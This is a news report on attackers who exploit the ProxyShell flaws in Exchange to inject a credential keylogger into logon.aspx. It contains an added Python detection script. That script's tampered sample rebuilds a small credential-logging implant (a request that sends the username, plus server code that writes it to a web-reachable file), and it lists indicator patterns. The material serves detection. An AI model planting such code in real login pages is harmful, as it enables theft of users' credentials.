An unidentified threat actor is exploiting known vulnerabilities in Microsoft Exchange Server to deploy keylogger malware in targeted attacks against organizations in Africa and the Middle East.
Russian cybersecurity firm Positive Technologies said it has identified more than 30 victims, including government agencies, banks, IT companies, and educational institutions. The earliest compromise dates back to 2021.
“This keylogger was aggregating account credentials into a file accessible via a unique pathway from the internet,” the company said in a report published recently.
Countries targeted include Russia, the U.A.E., Kuwait, Oman, Niger, Nigeria, Ethiopia, Mauritius, Jordan, and Lebanon.
The attack chains begin with the exploitation of the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), which Microsoft originally patched in May 2021.
Successful exploitation of these flaws allows attackers to bypass authentication, escalate privileges, and execute code remotely without authenticating. The exploit chain was discovered and disclosed by Orange Tsai of the DEVCORE Research Team.
After exploiting ProxyShell, the threat actors add the keylogger to the server's main page (logon.aspx), injecting code that, when the sign-in button is clicked, writes the entered credentials to a file reachable from the internet.
Positive Technologies said it cannot currently attribute the attacks to a specific threat actor or group without additional data.
In addition to updating Microsoft Exchange Server to the latest version, organizations are advised to check the Exchange Server main page for indicators of compromise, particularly the clkLgn() function in which the keylogger is embedded.
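One way to perform the check described above, as an added example that is not part of the report or of Positive Technologies' tooling: a scanner that isolates the clkLgn() function from a copy of logon.aspx, flags outbound-request code inside it and file-writing server-side blocks elsewhere in the page, and optionally compares the file against a known-good hash. The indicator lists, the helper name gbid, and both page samples are constructed assumptions, not the real OWA markup or the real implant.

```python
import hashlib
import re

# Client-side behaviour a stock clkLgn() has no reason to contain: an outbound
# request fired from the sign-in click handler (indicator list is an assumption).
CLIENT_INDICATORS = [r"XMLHttpRequest", r"\bfetch\s*\(", r"sendBeacon", r"new\s+Image\s*\("]
# Server-side code that writes request data to disk, matching the "file accessible
# from the internet" the report describes (indicator list is an assumption).
SERVER_INDICATORS = [r"File\.(AppendAllText|WriteAllText|AppendText)", r"StreamWriter", r"Request\s*\["]

def extract_clklgn(html):
    """Return the full text of 'function clkLgn() {...}' or None if the page lacks it."""
    m = re.search(r"function\s+clkLgn\s*\([^)]*\)\s*\{", html)
    if not m:
        return None
    depth = 0
    for i in range(m.end() - 1, len(html)):  # walk braces to the matching close
        if html[i] == "{":
            depth += 1
        elif html[i] == "}":
            depth -= 1
            if depth == 0:
                return html[m.start():i + 1]
    return html[m.start():]  # unbalanced braces: return the remainder

def scan_logon(html, known_good_sha256=None):
    """Return a list of findings for one logon.aspx; an empty list means nothing was flagged."""
    findings = []
    if known_good_sha256 and hashlib.sha256(html.encode()).hexdigest() != known_good_sha256:
        findings.append("logon.aspx hash differs from known-good baseline")
    body = extract_clklgn(html)
    if body is not None:
        for pat in CLIENT_INDICATORS:
            if re.search(pat, body):
                findings.append(f"clkLgn() contains outbound-request indicator: {pat}")
    for block in re.findall(r"<%(.*?)%>", html, re.S):  # inline ASP.NET code blocks
        for pat in SERVER_INDICATORS:
            if re.search(pat, block):
                findings.append(f"server-side block contains file/request indicator: {pat}")
    return findings

# Constructed samples: a minimal clean page and the same page with injected code.
CLEAN = """<%@ Page Language="C#" %>
<script type="text/javascript">
function clkLgn() { if (gbid('chkBsc')) { gbid('flags').value = 4; } document.logonForm.submit(); }
</script>"""
TAMPERED = CLEAN.replace(
    "document.logonForm.submit();",
    "var r = new XMLHttpRequest(); r.open('GET', '/owa/auth/logon.aspx?c=' + gbid('username').value, false); r.send(); document.logonForm.submit();",
) + """
<% if (Request["c"] != null) { System.IO.File.AppendAllText(Server.MapPath("log.txt"), Request["c"]); } %>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, scan_logon(page) or "no findings")
```

Run it against a copy of the live logon.aspx rather than the sample strings; a hash mismatch against a baseline taken from a clean install of the same Exchange build is the most reliable signal, and the indicator matches point at where to look.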
“If your server has been infiltrated, identify the exfiltrated account data and eradicate the file where this data is stored by adversaries,” the company advised. “The pathway to this file can be located within the logon.aspx file.”